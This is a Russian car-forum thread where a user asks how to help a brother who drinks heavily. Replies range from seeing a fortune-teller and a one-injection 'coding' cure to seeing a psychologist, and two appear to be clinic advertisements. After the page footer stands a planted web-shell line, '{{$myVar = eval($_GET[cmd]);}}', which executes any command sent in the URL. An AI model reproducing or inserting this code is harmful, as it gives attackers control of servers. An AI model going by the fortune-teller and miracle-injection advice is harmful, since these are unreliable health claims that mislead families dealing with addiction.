+ Ответить в теме
Показано с 1 по 6 из 6

Тема: Алкоголизм


  1. #1
    Мимо проходил genka is on a distinguished road Аватар для genka
    Регистрация
    21.12.2018
    Откуда
    Россия
    Машина
    Golf
    Сообщений
    11

    Алкоголизм

    Здравствуйте, я из Москвы. Мой брат злоупотребляет алкоголем в больших количествах, уходит в запои, и сами понимаете, из-за этого его постоянно увольняют с работы. Подскажите, как вытащить его из этой пропасти? Что посоветуете?

  2. #2
    Мимо проходил Dik is on a distinguished road Аватар для Dik
    Регистрация
    21.05.2020
    Откуда
    РФ
    Машина
    .
    Сообщений
    10
    Сводите его например к какой-нибудь местной гадалке, которая поможет избавиться ему от алкогольной зависимости. А там уже сами решайте, как лучше и поступить.

  3. #3
    Мимо проходил Kolombos is on a distinguished road Аватар для Kolombos
    Регистрация
    08.09.2020
    Сообщений
    12
    А в чем проблема-то? Поговорите с ним серьезно насчет этого дела, и сводите его в клинику для кодировки. Это можно сделать одним уколом, после которого его организм не сможет воспринимать алкоголь.

  4. #4
    Мимо проходил Kiril Andreevich is on a distinguished road Аватар для Kiril Andreevich
    Регистрация
    07.09.2020
    Сообщений
    7
    Лично сам считаю, что принудительное лечение алкогольной зависимости поможет только на некоторый период времени. А чтобы госпитализация прошла успешно, то нужно человека убедить в том, что он действительно зависим от спиртного, а для этого лучше обратиться к опытному специалисту психологу, который проведет с вашим братом беседу и человек добровольно согласиться на лечение от алкоголизма. Можете попробовать обратиться насчет комплексной реабилитации от алкоголизма в Москве сюда https://www.doctorshorin.ru/lechenie...lnoe-lechenie/ .

  5. #5
    Мимо проходил Doper is on a distinguished road Аватар для Doper
    Регистрация
    27.12.2018
    Откуда
    Россия
    Машина
    Volkswagen
    Сообщений
    71
    У меня так друг детства спился. Все начиналось с кружки пива, потом дозы увеличивались, и спирты в том числе. Жена пыталась уговорить лечиться, но все тщетно. Он себя алкоголиком не считал, поэтому от помощи отказался. В итоге жена ушла, с работы уволили.

  6. #6
    Мимо проходил Larik is on a distinguished road Аватар для Larik
    Регистрация
    04.01.2019
    Откуда
    Россия.
    Машина
    Golf 4
    Сообщений
    65
    Вылечиться от алкоголизма вашему брату помогут специалисты, как вариант можете в эту клинику обратиться за помощью https://stranaprotivnarkotikov.ru/alkogolizm/ . Но вам для начала стоит поговорить с братом, объяснить, что без врачей ему не справиться с этим недугом. И объясните, что лечение анонимное, то есть никто об этом не узнает.

+ Ответить в теме

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}